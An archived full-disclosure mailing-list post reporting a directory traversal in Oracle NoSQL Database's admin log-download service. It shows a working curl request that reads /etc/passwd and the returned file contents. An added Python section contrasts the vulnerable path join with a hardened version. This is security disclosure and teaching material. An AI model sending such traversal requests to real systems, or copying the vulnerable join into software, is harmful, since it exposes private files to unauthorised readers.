Open Source and information security mailing list archives
Message-ID: <CAAyDpL84dSivTo1wPVoq9h0HzeMU4t8iywrFk5Q+1TfQ7zN6gw@mail.gmail.com>
Date: Sat, 5 Nov 2011 18:58:20 +0100
From: Buherátor <buherator@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Oracle NoSQL Directory Traversal

Hi List,

I don't know if this is worth anything, because the manual says:

"Oracle NoSQL Database is intended to be installed in a secure location where physical and network access to the store is restricted to trusted users. For this reason, at this time Oracle NoSQL Database's security model is designed to prevent accidental access to the data. It is not designed to prevent malicious access or denial-of-service attacks."

Anyway, here is the deal:

+++
$ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd
* About to connect() to 127.0.0.1 port 5001 (#0)
*   Trying 127.0.0.1... connected
* Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
> GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
> User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18
> Host: 127.0.0.1:5001
> Accept: */*
>
< HTTP/1.1 200 OK
< Content-Type: application/octet-stream
< Content-Length: 1668
< Content-Disposition: attachment; filename="../../../../../../../../../../../../../../../etc/passwd"
< Server: Jetty(7.4.0.v20110414)
<
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
[...]
+++

Software: Oracle NoSQL Database 11gR2.1.1.100

Regards,
Buherator

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
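The request above works because the ?log= parameter is joined onto the log directory and the result is opened as-is, so a run of ../ segments climbs out of that directory. The following is an added example, not code from the post or from Oracle NoSQL Database (whose admin service is a Java servlet under Jetty; the logic is the same in any language), showing that vulnerable join next to a hardened resolver. LOG_DIR, unsafe_log_path and safe_log_path are hypothetical names chosen for the example, and the log directory path is constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed for this example (hypothetical location): the directory the
# log-download handler is supposed to serve files from.
LOG_DIR = "/var/kvroot/log"


def unsafe_log_path(log_dir, log_param):
    """The vulnerable pattern: join the untrusted ?log= value onto the log
    directory and open whatever that resolves to. Enough '../' segments
    climb past log_dir, which is exactly what the request in the post does
    (normpath clamps at '/', so any surplus '..' is simply discarded)."""
    return posixpath.normpath(posixpath.join(log_dir, log_param))


def safe_log_path(log_dir, log_param):
    """Hardened version. Returns the path to open, or None if the request
    must be refused. Two independent checks:
      1. allow-list the *name*: after URL-decoding twice (to defeat
         %252e-style double encoding) it must be a bare file name with no
         '/' or '\\', no NUL, and not starting with '.';
      2. containment: the lexically normalised result must still lie
         under log_dir, so even if check 1 is loosened later a separator
         that slips through cannot escape the directory.
    A production handler should additionally realpath() both sides so a
    symlink planted inside log_dir cannot point elsewhere; that is omitted
    here so the example runs without touching the filesystem."""
    name = unquote(unquote(log_param))
    if not name or "\x00" in name:
        return None
    if "/" in name or "\\" in name or name.startswith("."):
        return None
    candidate = posixpath.normpath(posixpath.join(log_dir, name))
    root = posixpath.normpath(log_dir)
    if posixpath.commonpath([root, candidate]) != root:
        return None
    return candidate


if __name__ == "__main__":
    payload = "../../../../../../../../../../../../../../../etc/passwd"
    print("unsafe:", unsafe_log_path(LOG_DIR, payload))   # escapes to /etc/passwd
    print("safe:  ", safe_log_path(LOG_DIR, payload))     # refused (None)
    print("safe:  ", safe_log_path(LOG_DIR, "admin_0.log"))
```

The basename allow-list is the check that actually closes the hole; the commonpath containment test is defence in depth, and the realpath step mentioned in the docstring is what turns a lexical check into one that also survives symlinks.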